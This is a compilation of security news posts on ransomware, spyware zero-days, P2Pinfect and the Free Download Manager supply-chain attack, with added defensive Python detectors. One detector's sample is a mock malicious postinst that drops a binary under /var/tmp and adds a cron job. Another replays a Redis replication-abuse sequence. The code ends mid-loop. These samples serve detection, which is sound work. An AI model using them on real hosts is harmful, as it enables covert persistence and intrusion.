
City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack

The City of Dallas revealed that the Royal ransomware gang that hit its systems in May used a stolen service account.

In May 2023, a ransomware attack hit the IT systems at the City of Dallas, Texas. To prevent the threat from spreading within the network, the City shut down the impacted IT systems.

The City confirmed the security incident and is working to recover from the ransomware attack that impacted its services, including the police department.

The attack impacted fewer than 200 devices, and essential services such as 911 kept working. At the time, BleepingComputer reported that the City’s court system canceled all jury trials and jury duty for several days starting from May 2.

CBS News Texas obtained an image of the ransom note dropped by the malware on the infected systems.

City of Dallas An image of the ransomware note received by the City of Dallas J.D. MILES/CBS NEWS TEXAS

The Royal ransomware group claimed the attack and threatened to publish the stolen data if the City did not meet its ransom demand.

According to the report “THE CITY OF DALLAS RANSOMWARE INCIDENT: MAY 2023”, published on September 20, 2023 by the City of Dallas Department of Information & Technology Services (ITS) Risk Management, Security, and Compliance Services, the Royal ransomware group gained access to the City’s infrastructure using a stolen domain service account. Once inside the City’s network, the group performed reconnaissance and information-gathering activities using legitimate third-party remote management tools. Between April 7, 2023, and May 4, 2023, Royal carried out data exfiltration and ransomware delivery preparation.

The Royal group began reconnaissance activity in April 2023; system log data dates the start of the surveillance operations to April 7, 2023.

“Royal’s initial access utilized the basic service domain service account, connecting to a server. Royal was then able to traverse the internal City infrastructure during the surveillance period using legitimate 3rd party remote management tools.” reads the report. “Using the City service account credentials, Royal performed reconnaissance activities in the City’s IT infrastructure during the period of April 7, 2023, through May 4, 2023. During this time, Royal performed data exfiltration and ransomware delivery preparation activities.”

The group exfiltrated approximately 1.169 TB of data from the City prior to May 3, 2023.

“During the surveillance period, Royal performed several actions to inject command and control software and established command-and-control beacons. The command-and-control beacons allowed Royal to prepare the City’s network resources for the May 03, 2023, ransomware encryption attack.” continues the report.

Early on the morning of Wednesday, May 3, 2023, the group began executing the ransomware on the City’s systems. The City’s experts believe the group targeted a prioritized list of servers, using legitimate Microsoft system administration tools to deploy the payload.

The City immediately initiated mitigation efforts after the discovery of the attack and it started restoring its services with the help of external cybersecurity experts.

The experts spent more than five weeks restoring the servers, from May 9 to June 13.

The City reported to the Texas Office of the Attorney General (TxOAG) that the personal information of 26,212 Texas residents (30,253 people in total) was potentially impacted.

According to the notice published on the website of the OAG on August 07, 2023, exposed personal information includes names, addresses, social security information, health information, and health insurance information.

The Dallas City Council has approved a budget of $8.5 million to mitigate the ransomware attack.

The human-operated Royal ransomware first appeared on the threat landscape in September 2022 and has demanded ransoms of up to millions of dollars.

Unlike other ransomware operations, Royal doesn’t offer Ransomware-as-a-Service, it appears to be a private group without a network of affiliates.

Once they have compromised a victim’s network, the threat actors deploy the post-exploitation tool Cobalt Strike to maintain persistence and move laterally.

Royal ransomware is written in C++ and targets Windows systems; it deletes all Volume Shadow Copies to prevent data recovery. The ransomware encrypts the local drives and any network shares it finds on the local network using the AES algorithm.

In March 2023, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) providing organizations with the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with this ransomware family.

According to government experts, Royal ransomware attacks have targeted numerous critical infrastructure sectors, including manufacturing, communications, healthcare and public health (HPH), and education.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, City of Dallas)

The post City of Dallas has set a budget of $8.5 million to mitigate the May Royal ransomware attack appeared first on Security Affairs.

Recently patched Apple and Chrome zero-days exploited to infect devices in Egypt with Predator spyware

Citizen Lab and Google’s TAG revealed that the three recently patched Apple zero-days were used to install Cytrox Predator spyware.

Researchers from the Citizen Lab and Google’s Threat Analysis Group (TAG) revealed that the three Apple zero-days addressed this week were used as part of an exploit to install Cytrox Predator spyware.

Apple this week released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild.

The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group. The two research teams have already discovered multiple actively exploited zero-days in Apple products that were exploited in targeted attacks against high-profile individuals, such as opposition politicians, dissidents, and journalists.

CVE-2023-41993 is an arbitrary code execution issue that resides in WebKit.

An attacker can trigger the flaw by tricking the victim into visiting specially crafted web content, leading to arbitrary code execution. Apple addressed the flaw with improved checks.

The second zero-day, tracked as CVE-2023-41991, resides in the Security framework; a malicious app can exploit it to bypass signature validation. Apple fixed a certificate validation issue.

The third zero-day, tracked as CVE-2023-41992, resides in the Kernel. A local attacker can trigger the flaw to elevate their privileges. Apple fixed the flaw with improved checks.

“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.” reads the advisory published by the company.

According to Citizen Lab and Google’s Threat Analysis Group (TAG) researchers, threat actors exploited the zero-days to target former Egyptian MP Ahmed Eltantawy after he announced his candidacy in the 2024 presidential election.

🚨🚨 BIG : WE URGE ALL USERS TO UPDATE THEIR #Apple devices urgently.@citizenlab in coordination with @Google’s TAG team found that former Egyptian MP Ahmed Eltantawy was targeted with Cytrox’s #Predator #spyware through links sent via SMS and WhatsApp.https://t.co/YepUzuLQXU

— Citizen Lab (@citizenlab) September 22, 2023

Threat actors attempted to hack Eltantawy’s device between May and September 2023 by sending him decoy SMS and WhatsApp messages.

“In August and September 2023, Eltantawy’s Vodafone Egypt mobile connection was persistently selected for targeting via network injection; when Eltantawy visited certain websites not using HTTPS, a device installed at the border of Vodafone Egypt’s network automatically redirected him to a malicious website to infect his phone with Cytrox’s Predator spyware.” reads the report published by Citizen Lab. “During our investigation, we worked with Google’s Threat Analysis Group (TAG) to obtain an iPhone zero-day exploit chain (CVE-2023-41991, CVE-2023-41992, CVE-2023-41993) designed to install Predator on iOS versions through 16.6.1. We also obtained the first stage of the spyware, which has notable similarities to a sample of Cytrox’s Predator spyware we obtained in 2021. We attribute the spyware to Cytrox’s Predator spyware with high confidence.”

Google TAG researchers provided details about the iOS exploit chain that ran once the target had been redirected to the specially crafted web pages: CVE-2023-41993 is exploited to gain initial remote code execution (RCE) in Safari, CVE-2023-41991 is then used to bypass signature validation, and CVE-2023-41992 is used to escalate privileges to the kernel.

The exploit chain runs a small binary that decides whether or not to install the full Predator implant; TAG explained that it was unable to capture the full implant.

“The attacker also had an exploit chain to install Predator on Android devices in Egypt. TAG observed these exploits delivered in two different ways: the MITM injection and via one-time links sent directly to the target. We were only able to obtain the initial renderer remote code execution vulnerability for Chrome, which was exploiting CVE-2023-4762.” reads the analysis published by Google TAG. “We assess that Intellexa was also previously using this vulnerability as a 0-day.”

Citizen Lab attributed the attacks to the Egyptian government, a known Cytrox customer. The researchers also noted that the spyware was delivered via network injection from a device physically located in Egypt.


This was not the first time Eltantawy’s phone had been infected with Cytrox’s Predator spyware: his iPhone was first infected in November 2021.

Citizen Lab urged all Apple users to update their devices immediately and enable Lockdown Mode.

“This campaign is yet another example of the abuses caused by the proliferation of commercial surveillance vendors and their serious risk to the safety of online users.” concluded TAG researcher Maddie Stone.


Pierluigi Paganini

(SecurityAffairs – hacking, Apple)


CISA adds Trend Micro Apex One and Worry-Free Business Security flaw to its Known Exploited Vulnerabilities catalog

US CISA added the flaw CVE-2023-41179 in Trend Micro Apex One and Worry-Free Business Security to its Known Exploited Vulnerabilities catalog.

US Cybersecurity and Infrastructure Security Agency (CISA) added the high-severity flaw CVE-2023-41179 (CVSS score 7.2) affecting Trend Micro Apex One and Worry-Free Business Security to its Known Exploited Vulnerabilities Catalog.

This week Trend Micro released security updates to patch an actively exploited zero-day vulnerability, tracked as CVE-2023-41179, impacting its endpoint security products, including Apex One, Apex One SaaS, and Worry-Free Business Security.

According to the security firm, the vulnerability has been exploited in attacks. The flaw is related to the products’ ability to uninstall third-party security software, and an attacker can only trigger it after logging into the product’s administrative console.

“An arbitrary code execution vulnerability has been identified in the Apex One SaaS, Biz, and VBBSS agents’ ability to uninstall third-party security products. To exploit this vulnerability, an attacker would need to be able to log into the product’s administrative console.” reads the advisory published by Trend Micro. “Because an attacker would need to have stolen the product’s management console authentication information in advance, they would not be able to infiltrate the target network using this vulnerability alone.”

The vendor recommends customers update their installs to the latest version as soon as possible.

Trend Micro pointed out that the exploitation of this type of flaw typically requires an attacker to have access to the vulnerable device. To mitigate the risk of exploitation the company recommends allowing access only from trusted networks.

Trend Micro has not shared any information regarding the attacks exploiting this vulnerability.

Japan’s JPCERT/CC has also published an alert regarding this vulnerability.

“Since the vulnerability is already being exploited in the wild, the users of the affected products are recommended to update the affected system to the latest version as soon as possible.” reads the alert.

Under Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies must address the cataloged vulnerabilities by the due date to protect their networks against attacks exploiting them.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this flaw by October 12, 2023.


Pierluigi Paganini

(SecurityAffairs – hacking, CISA)


Information of Air Canada employees exposed in recent cyberattack

Air Canada, the flag carrier and largest airline of Canada, announced that the personal information of some employees was exposed as a result of a recent cyberattack.

Air Canada, the flag carrier and largest airline of Canada, announced that threat actors had access to the personal information of some employees during a recent cyberattack.

“An unauthorized group briefly obtained limited access to an internal Air Canada system related to limited personal information of some employees and certain records. We can confirm that our flight operations systems and customer facing systems were not affected. No customer information was accessed.” reads the statement published by the company. “We have contacted parties whose information has been involved as appropriate, as well as the relevant authorities.”

The company states that its flight operations systems and customer-facing systems were not affected by the cyberattack.

The carrier confirmed that its systems are fully operational, it also announced it has implemented further security measures with the help of leading global cyber security experts.

According to the statement, the attackers had access to one of the company’s internal systems.

The airline notified the impacted employees and the relevant authorities.

Air Canada did not share details about the attack, at the time of this writing, no known extortion group has claimed responsibility for the cyber attack.

A few days earlier, the pro-Russia group NoName057(16) claimed to have launched DDoS attacks on several Canadian organizations, including the Canada Border Services Agency (CBSA), the Canadian Air Transport Security Authority, and the Senate.

The attacks severely impacted operations at several Canadian airports last week.

The Canada Border Services Agency (CBSA) confirmed that the attack impacted check-in kiosks and electronic gates at airports. The cyber attack caused delays in the processing of arrivals for more than an hour at border checkpoints across the country.

The Canadian Centre for Cyber Security published an alert warning of a Distributed Denial of Service campaign targeting multiple Canadian sectors.

“Since 13 September 2023, the Cyber Centre has been aware and responding to reports of several distributed denial of service (DDoS ) campaigns targeting multiple levels within the Government of Canada, as well as the financial and transportation sectors.” reads the alert. “This Alert is being published to raise awareness of these campaigns, to highlight the potential impact to government services and to provide guidance for organizations who may be targeted by malicious activity.”

In August 2018, Air Canada suffered a data breach that may have affected 20,000 customers (about 1%) of its 1.7 million mobile app users.

Air Canada detected unusual login behaviour on its mobile app between August 22 and 24, 2018; it said financial data was protected but invited users to remain vigilant for fraudulent credit card transactions.


Pierluigi Paganini

(SecurityAffairs – hacking, Air Canada)


Sandman APT targets telcos with LuaDream backdoor

A previously undocumented APT dubbed Sandman targets telecommunication service providers in the Middle East, Western Europe, and South Asia.

Joint research by SentinelLabs and QGroup GmbH revealed that a previously undetected APT group, dubbed Sandman, is targeting telecommunication service providers in the Middle East, Western Europe, and South Asia.

The APT group is using a modular backdoor, named LuaDream, written in the Lua programming language. LuaDream allows operators to exfiltrate system and user information, paving the way for further targeted attacks.

LuaDream core components (SentinelOne report)

Sandman deploys the backdoor through the LuaJIT platform, which is rarely seen in the threat landscape. SentinelLabs clarified that the attackers use LuaJIT as a vehicle to stage LuaDream and install additional malware in the target infrastructure.

The attacks are characterized by strategic lateral movements and minimal engagements, likely to minimize the risk of detection.

Threat actors can extend LuaDream’s features by using specific plugins.

The researchers explained that the attacks were detected and interrupted before the plugins were deployed; however, analysis of LuaDream samples previously uploaded to VirusTotal allowed them to study the plugins’ functionality. Some of the plugins support command execution.

The researchers identified a total of 36 distinct LuaDream components, suggesting that we are facing a large-scale project that requires significant effort. The malware supports multiple communication protocols for C2 (Command and Control) operations.

“LuaDream’s staging chain is purposefully crafted to avoid detection and hinder analysis, seamlessly injecting the malware into memory. To achieve this, LuaDream takes advantage of the LuaJIT platform, a just-in-time compiler for the Lua scripting language.” continues the report. “This strategic choice enhances the stealth of malicious Lua script code, making it challenging to detect.”

Sandman is suspected to be a motivated and capable threat actor that carries out cyber espionage activities.

Analysis of compilation timestamps and a string artifact found within LuaDream suggests that the malware dates back to the first half of 2022. The researchers were unable to link LuaDream to any known threat actor and speculate that the operator may be a private contractor or mercenary group.

“Attributing Sandman remains a mystery, placing it in the same enigmatic category as Metador and other elusive threat actors who operate with impunity. LuaDream stands as a compelling illustration of the continuous innovation and advancement efforts that cyber espionage threat actors pour into their ever-evolving malware arsenal.” concludes the report.


Pierluigi Paganini

(SecurityAffairs – hacking, Sandman APT)


Experts warn of a 600X increase in P2Pinfect traffic

Researchers warn of a surge in P2PInfect botnet activity since late August 2023, with 3,619 events observed between September 12 and 19, 2023 alone.

In July 2023, Palo Alto Networks Unit 42 researchers discovered a new peer-to-peer (P2P) worm called P2PInfect that targets Redis servers running on both Linux and Windows systems. The capability to target Redis servers running on both Linux and Windows operating systems makes P2PInfect more scalable and potent than other worms. 

The worm is written in Rust and, according to Unit 42, targets Redis instances by exploiting the Lua sandbox escape vulnerability CVE-2022-0543 (CVSS score 10.0).

Cado Security Labs researchers reported to have witnessed a 600x increase in P2Pinfect traffic since August 28th. According to the researchers, traffic experienced a 12.3% surge during the week leading up to the publication of their analysis.

P2Pinfect infections have been reported in China, the United States, Germany, the United Kingdom, Singapore, Hong Kong and Japan.

Experts linked the surge in botnet traffic with the growing number of variants detected in the wild, a circumstance that suggests that the authors are actively improving their bot.

“P2Pinfect activity has increased rapidly with 3,619 events observed during the week of the 12th – 19th of September alone – an increase of 60216.7%!” reads the analysis published by Cado Security Labs. “This increase in P2Pinfect traffic has coincided with a growing number of variants seen in the wild, suggesting that the malware’s developers are operating at an extremely high development cadence. In just one week prior to this blog’s publication, Cado researchers identified a 12.3% increase in P2Pinfect activity.”


Below is the attack chain observed by the researchers:

  • Malicious node (designated as Initial Access (IA) Sender by Cado researchers) connects to the target and issues the Redis SLAVEOF command to enable replication.
  • The attacker delivers a malicious Redis module to the target, allowing arbitrary shell commands to be run.
  • The module is used to execute a command to retrieve the primary payload from a designated downloader node (referred to as IA Downloader), before writing it to /tmp and executing it with the encoded list of botnet peers. The researchers pointed out that this command differs slightly from the one observed in Cado’s original analysis.
  • The attacker executes another shell command to remove the Redis module from disk and disables replication via the SLAVEOF NO ONE Redis command.
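The four steps above are all ordinary Redis commands, so they are visible to anyone watching the command stream. The following is an added example, not part of the Cado analysis, that parses constructed `redis-cli MONITOR` output and reports a client that pointed the instance at an external master, loaded a module, and then detached with SLAVEOF NO ONE; the IP addresses, module path and timestamps are made up.

```python
"""Spot the Redis replication-abuse sequence above in MONITOR output.

Added example; this is not Cado's tooling and the log lines are constructed.
Redis MONITOR prints one line per command in the form
    <unix-ts> [<db> <client-addr>] "CMD" "arg1" "arg2" ...
The detector tracks, per client address, a SLAVEOF/REPLICAOF pointing the
instance at an external master, a following MODULE LOAD, and the closing
SLAVEOF NO ONE, and reports the client when all three occur within a window.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>.+?)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_monitor_line(line):
    """Return {'ts','client','cmd','args'} for a MONITOR line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group('args'))
    if not args:
        return None
    # drop the port so reconnects from the same host are tracked together
    client = m.group('client').rsplit(':', 1)[0]
    return {'ts': float(m.group('ts')), 'client': client,
            'cmd': args[0].upper(), 'args': args[1:]}


def detect_replication_abuse(lines, window_seconds=300):
    """Return [(client, description)] for each completed SLAVEOF -> MODULE LOAD -> SLAVEOF NO ONE chain."""
    state = defaultdict(dict)   # client -> {'master', 'module', 't0'}
    findings = []
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        st = state[ev['client']]
        upper = [a.upper() for a in ev['args']]
        if ev['cmd'] in ('SLAVEOF', 'REPLICAOF'):
            if upper[:2] == ['NO', 'ONE']:
                # step 4 of the chain: detach from the rogue master
                if 'master' in st and 'module' in st and ev['ts'] - st['t0'] <= window_seconds:
                    elapsed = ev['ts'] - st['t0']
                    findings.append((ev['client'],
                                     f"SLAVEOF {st['master']} -> MODULE LOAD {st['module']} "
                                     f"-> SLAVEOF NO ONE in {elapsed:.0f}s"))
                st.clear()
            elif len(ev['args']) >= 2:
                # step 1: instance pointed at an attacker-controlled master
                st.clear()
                st.update(master=f"{ev['args'][0]}:{ev['args'][1]}", t0=ev['ts'])
        elif ev['cmd'] == 'MODULE' and upper[:1] == ['LOAD']:
            # step 2: a module is loaded while replication is active
            module = ev['args'][1] if len(ev['args']) > 1 else '?'
            if 'master' in st:
                st['module'] = module
            else:
                findings.append((ev['client'], f"MODULE LOAD {module} with no preceding SLAVEOF"))
    return findings


# Constructed MONITOR excerpt: one attacker (10.20.30.40) running the chain,
# one operator host (10.0.0.9) doing a legitimate failover with SLAVEOF NO ONE.
SAMPLE_MONITOR = """\
1694890000.100000 [0 10.20.30.40:51234] "SLAVEOF" "198.51.100.7" "6379"
1694890003.200000 [0 10.20.30.40:51234] "MODULE" "LOAD" "/tmp/exp.so"
1694890006.000000 [0 10.20.30.40:51234] "SLAVEOF" "NO" "ONE"
1694890010.000000 [0 10.0.0.9:40000] "SLAVEOF" "NO" "ONE"
1694890011.000000 [0 10.0.0.9:40000] "GET" "session:abc"
"""

if __name__ == '__main__':
    for client, what in detect_replication_abuse(SAMPLE_MONITOR.splitlines()):
        print(f'{client}: {what}')
```

MONITOR is expensive on a busy instance, so feed the detector a short capture or the equivalent events from a proxy. The prevention side is configuration rather than detection: on an internet-reachable Redis keep `protected-mode yes` and `requirepass`/ACLs on, and neuter the commands the chain needs with `rename-command SLAVEOF ""`, `rename-command REPLICAOF ""` and (Redis 7) `enable-module-command no`.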

While the original P2Pinfect bot lacked a persistence mechanism, recent samples rely on a cron job to launch the malware every 30 minutes.

Recent samples also support another persistence technique that uses the bash payload to keep the main payload alive.

Recent P2Pinfect samples overwrite existing SSH authorized_keys files with an attacker-controlled SSH key.

The main payload also iterates through all users on the system and attempts to change their user passwords. The malware changes the passwords to a string prefixed by Pa_ and followed by 7 alphanumeric characters (e.g. Pa_13HKlak). The experts noticed that a new password is generated for each build. The malware uses the Linux chpasswd utility to change the passwords likely because the developer expects to obtain root in the target environment.
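The three host-side changes above (a cron entry, a rewritten authorized_keys, and passwords rotated with chpasswd) each leave a checkable trace. The following is an added example, not part of Cado's report, with one check per change; the crontab, authorized_keys and shadow contents are constructed, and the two SSH keys are placeholder blobs rather than real keys.

```python
"""Host triage for the P2Pinfect persistence changes described above.

Added example, not from Cado's report. Each check takes file contents as text
so it can run on a live host (open the files) or on copies lifted from an
image. The sample inputs are constructed, including the two fake SSH keys.
"""
import base64
import hashlib

STAGING_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/')


def suspicious_cron_entries(crontab_text):
    """Flag crontab lines whose command runs from a world-writable staging dir.

    Works for user crontabs (5 schedule fields + command) and /etc/cron.d files
    (5 fields + user + command). Recent P2Pinfect samples use a */30 schedule,
    but the schedule is not the signal because it is trivial to change."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith('#') or '=' in s.split()[0]:
            continue  # blank, comment, or VAR=value line
        fields = s.split(None, 5)
        if len(fields) == 6 and any(d in fields[5] for d in STAGING_DIRS):
            hits.append(s)
    return hits


def ssh_key_fingerprint(key_line):
    """SHA256 fingerprint (ssh-keygen -lf format) of one authorized_keys line, or None."""
    parts = key_line.split()
    for i, tok in enumerate(parts[:-1]):
        if tok.startswith(('ssh-', 'ecdsa-sha2-', 'sk-')):   # key type follows any options
            blob = base64.b64decode(parts[i + 1])
            digest = hashlib.sha256(blob).digest()
            return 'SHA256:' + base64.b64encode(digest).decode().rstrip('=')
    return None


def foreign_ssh_keys(authorized_keys_text, approved_fingerprints):
    """Lines in authorized_keys whose fingerprint is not in the approved set.
    P2Pinfect overwrites the file, so an approved key going missing is also worth an alert."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        if not line.strip() or line.lstrip().startswith('#'):
            continue
        if ssh_key_fingerprint(line) not in approved_fingerprints:
            unknown.append(line.strip())
    return unknown


def mass_password_change(shadow_text, min_accounts=3):
    """Return the lastchange day (days since epoch) if every account with a
    password hash in /etc/shadow was changed on the same day, else None.
    P2Pinfect runs chpasswd for all users, which leaves exactly this footprint."""
    days = []
    for line in shadow_text.splitlines():
        f = line.split(':')
        if len(f) < 3 or f[1] in ('', '*') or f[1].startswith('!'):
            continue  # locked or passwordless account
        if f[2].isdigit():
            days.append(int(f[2]))
    if len(days) >= min_accounts and len(set(days)) == 1:
        return days[0]
    return None


# --- constructed samples ----------------------------------------------------
SAMPLE_CRON = """\
# m h dom mon dow command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
0 3 * * * /usr/local/bin/backup.sh
*/30 * * * * /tmp/loader -peers AAAAB3Nz
"""
# Not real keys: a valid ed25519 blob prefix followed by a filler body.
OPS_KEY = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI' + 'A' * 43 + ' ops@jump'
PLANTED_KEY = 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI' + 'B' * 43
APPROVED = {ssh_key_fingerprint(OPS_KEY)}
SAMPLE_AUTH_KEYS = OPS_KEY + '\n' + PLANTED_KEY + '\n'

INFECTED_SHADOW = """\
root:$6$saltsalt$hash1:19630:0:99999:7:::
deploy:$6$saltsalt$hash2:19630:0:99999:7:::
backup:$6$saltsalt$hash3:19630:0:99999:7:::
nobody:*:18000:0:99999:7:::
"""
CLEAN_SHADOW = """\
root:$6$saltsalt$hash1:19630:0:99999:7:::
deploy:$6$saltsalt$hash2:19402:0:99999:7:::
backup:$6$saltsalt$hash3:19511:0:99999:7:::
"""

if __name__ == '__main__':
    print('cron:', suspicious_cron_entries(SAMPLE_CRON))
    print('unknown keys:', foreign_ssh_keys(SAMPLE_AUTH_KEYS, APPROVED))
    print('mass password change day:', mass_password_change(INFECTED_SHADOW))
```

On a real host, feed `suspicious_cron_entries` the contents of each file under /etc/cron.d, /var/spool/cron and `crontab -l` output per user, build the approved set from fingerprints recorded at provisioning time, and read /etc/shadow as root. The shadow check is a heuristic: a fleet-wide password rotation by an administrator produces the same footprint, so treat a hit as a lead, not a verdict.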

Despite the growing sophistication of the malware, P2PInfect’s exact goals are unclear. Cado Security said it observed the malware attempting to fetch a crypto miner payload, but there is no evidence of cryptomining to date.

“It’s clear that P2Pinfect’s developers are committed to maintaining and iterating on the functionality of their malicious payloads, while simultaneously scaling the botnet across continents and cloud providers at a rapid rate. Despite this, the primary objective of this malware remains unclear. Recent variants still attempt to retrieve the miner payload described in Cado’s original analysis, yet no evidence of cryptomining has been detected to date.” concludes the report that includes Indicators of Compromise (IoCs). “The miner payload itself hadn’t been updated since the original discovery in late July, yet the botnet agent received multiple updates in this time. It is expected that those behind the botnet are either waiting to implement additional functionality in the miner payload, or are intending to sell access to the botnet to other individuals or groups.”


Pierluigi Paganini

(SecurityAffairs – hacking, botnet)


Apple rolled out emergency updates to address 3 new actively exploited zero-day flaws

Apple released emergency security updates to address three new actively exploited zero-day vulnerabilities.

Apple released emergency security updates to address three new zero-day vulnerabilities (CVE-2023-41993, CVE-2023-41991, CVE-2023-41992) that have been exploited in attacks in the wild.

The three flaws were discovered by Bill Marczak of The Citizen Lab at The University of Toronto’s Munk School and Maddie Stone of Google’s Threat Analysis Group. The two research teams have already discovered multiple actively exploited zero-days in Apple products that were exploited in targeted attacks against high-profile individuals, such as opposition politicians, dissidents, and journalists.

CVE-2023-41993 is an arbitrary code execution issue that resides in WebKit.

An attacker can trigger the flaw by tricking the victim into visiting specially crafted web content, leading to arbitrary code execution. Apple addressed the flaw with improved checks.

The second zero-day, tracked as CVE-2023-41991, resides in the Security framework; a malicious app can exploit it to bypass signature validation. Apple fixed a certificate validation issue.

The third zero-day, tracked as CVE-2023-41992, resides in the Kernel. A local attacker can trigger the flaw to elevate their privileges. Apple fixed the flaw with improved checks.

“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.” reads the advisory published by the company.

The company fixed the three zero-days with the release of macOS 12.7/13.6, iOS 16.7/17.0.1, iPadOS 16.7/17.0.1, and watchOS 9.6.3/10.0.1.

Fixes are available for iPhone XS and later; iPad Pro 12.9-inch 2nd generation and later; iPad Pro 10.5-inch; iPad Pro 11-inch 1st generation and later; iPad Air 3rd generation and later; iPad 6th generation and later; and iPad mini 5th generation and later.

Apple has already patched 16 actively exploited zero-day vulnerabilities in 2023, below is the list of the flaws fixed by the company:


Pierluigi Paganini

(SecurityAffairs – hacking, zero-day)


Ukrainian hackers are behind the Free Download Manager supply chain attack

The recently discovered Free Download Manager (FDM) supply chain attack, which distributed Linux malware, started back in 2020.

The maintainers of Free Download Manager (FDM) confirmed that the recently discovered supply chain attack dates back to 2020.

Recently, researchers from Kaspersky reported that the Free Download Manager site had been compromised to serve Linux malware. While investigating a set of suspicious domains, the experts identified a deb.fdmpkg[.]org subdomain.

Visiting the subdomain in a browser, the researchers found a page claiming that the domain hosts a Debian repository for software named ‘Free Download Manager’.

“This package turned out to contain an infected postinst script that is executed upon installation. This script drops two ELF files to the paths /var/tmp/crond and /var/tmp/bs. It then establishes persistence by creating a cron task (stored in the file /etc/cron.d/collect) that launches the /var/tmp/crond file every 10 minutes.” reported Kaspersky.

The Free Download Manager version installed by the malicious package was released on January 24, 2020. In the postinst script the experts found comments in Russian and Ukrainian, including notes about improvements made to the malware.

Upon installing the malicious package, the executable /var/tmp/crond is launched on every startup through cron. The executable is a backdoor that accesses the Linux API and invokes syscalls using the statically linked dietlibc library.
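Everything Kaspersky describes here happens in the package's postinst, which dpkg runs as root. The following added example, not code from Kaspersky or the FDM project, reads a .deb's maintainer scripts without dpkg and flags lines that write under /var/tmp or install a cron entry; the package it audits is built in memory with a postinst that imitates the described behaviour and is a constructed sample, not the real artifact.

```python
"""Inspect a .deb's maintainer scripts before installing it.

Added example (not Kaspersky's or FDM's code). A Debian package is an ar
archive holding debian-binary, control.tar.* and data.tar.*; postinst and
the other maintainer scripts live in control.tar.*. This reads them without
dpkg and flags the behaviours described above: writing to /var/tmp and
installing a cron entry. The package at the bottom is built in memory with a
postinst that imitates that behaviour; it is a constructed sample, not the
real artifact, and the patterns are heuristics rather than signatures.
"""
import io
import re
import tarfile

SUSPICIOUS = [
    (re.compile(r'/var/tmp/|/tmp/|/dev/shm/'), 'writes or runs files in a world-writable temp dir'),
    (re.compile(r'/etc/cron\.d/|/etc/cron\.(hourly|daily)|\bcrontab\b'), 'installs a cron job'),
    (re.compile(r'\b(curl|wget)\b.*https?://'), 'downloads from the network'),
    (re.compile(r'base64\s+(-d|--decode)'), 'decodes an embedded blob'),
]
MAINTAINER_SCRIPTS = ('preinst', 'postinst', 'prerm', 'postrm')


def ar_members(blob):
    """Yield (name, data) for each member of a classic ar archive."""
    if not blob.startswith(b'!<arch>\n'):
        raise ValueError('not an ar archive')
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b'`\n':
            raise ValueError('bad ar member header at offset %d' % pos)
        name = hdr[0:16].decode().rstrip(' /')      # GNU ar terminates names with '/'
        size = int(hdr[48:58].decode().strip())
        start = pos + 60
        yield name, blob[start:start + size]
        pos = start + size + (size & 1)             # members start on even offsets


def maintainer_scripts(deb_bytes):
    """Return {script_name: text} for the maintainer scripts found in control.tar.*."""
    scripts = {}
    for name, data in ar_members(deb_bytes):
        if not name.startswith('control.tar'):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode='r:*') as tar:
            for member in tar.getmembers():
                base = member.name.lstrip('./')
                if base in MAINTAINER_SCRIPTS and member.isfile():
                    scripts[base] = tar.extractfile(member).read().decode('utf-8', 'replace')
    return scripts


def audit_deb(deb_bytes):
    """Return [(script, line_no, reason, line)] for every suspicious line."""
    findings = []
    for script, text in maintainer_scripts(deb_bytes).items():
        for line_no, line in enumerate(text.splitlines(), 1):
            for pattern, reason in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((script, line_no, reason, line.strip()))
    return findings


# ---- constructed sample package ------------------------------------------
def _ar_member(name, data):
    hdr = f'{name:<16}{0:<12}{0:<6}{0:<6}{"100644":<8}{len(data):<10}`\n'.encode()
    return hdr + data + (b'\n' if len(data) % 2 else b'')


def _tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode='w:gz') as tar:
        for fname, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(fname)
            info.size, info.mode = len(data), 0o755
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_deb(postinst_text):
    control = 'Package: sample\nVersion: 0\nArchitecture: all\nMaintainer: x\nDescription: y\n'
    return (b'!<arch>\n'
            + _ar_member('debian-binary', b'2.0\n')
            + _ar_member('control.tar.gz', _tar_gz({'./control': control, './postinst': postinst_text}))
            + _ar_member('data.tar.gz', _tar_gz({})))


# Imitates the behaviour Kaspersky describes (drop a binary under /var/tmp, add a
# cron entry); the $BLOB variable is a placeholder for the embedded payload.
MALICIOUS_POSTINST = """#!/bin/sh
set -e
printf '%s' "$BLOB" | base64 -d > /var/tmp/crond
chmod +x /var/tmp/crond
echo '*/10 * * * * root /var/tmp/crond' > /etc/cron.d/collect
"""

if __name__ == '__main__':
    for script, line_no, reason, line in audit_deb(build_sample_deb(MALICIOUS_POSTINST)):
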